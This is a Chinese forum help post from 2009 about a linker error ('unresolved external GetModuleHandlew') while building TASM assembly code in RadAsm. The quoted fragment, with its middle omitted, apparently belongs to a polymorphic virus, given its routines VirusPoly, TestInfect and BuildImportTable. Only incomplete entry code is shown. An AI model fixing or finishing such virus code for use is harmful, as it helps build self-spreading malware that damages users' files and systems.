-
-
[求助]Tasm工程构建的问题
-
发表于:
2009-5-13 15:05
3879
-
有一段TASM的代码,用配好的Radasm编译。编译成功,构建时出现了
Unresolved external 'GetModuleHandlew' referenced from module test.asm 这样的错误。
相关代码段如下
.CODE
extern
GetModuleHandlew :PROC
start:
mov esi, offset start
mov eax, esi
call vCodeCheck
add esi, ecx
jmp $ - 9
mov ebp, offset vdelta
push offset nKernel32
call
GetModuleHandlew
xchg edx, eax
mov esi, offset KNLAPILIST
mov edi, offset KNLAPICALL
call BuildImportTable
rdtsc
call srand
mov ebp, offset vdelta
sub esp, 256
mov edi, esp
call VirusPoly
add esp, 256
ret
call TestInfect
ret
…………………………中间略……………………
END start
这是什么缘故造成的呢?
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)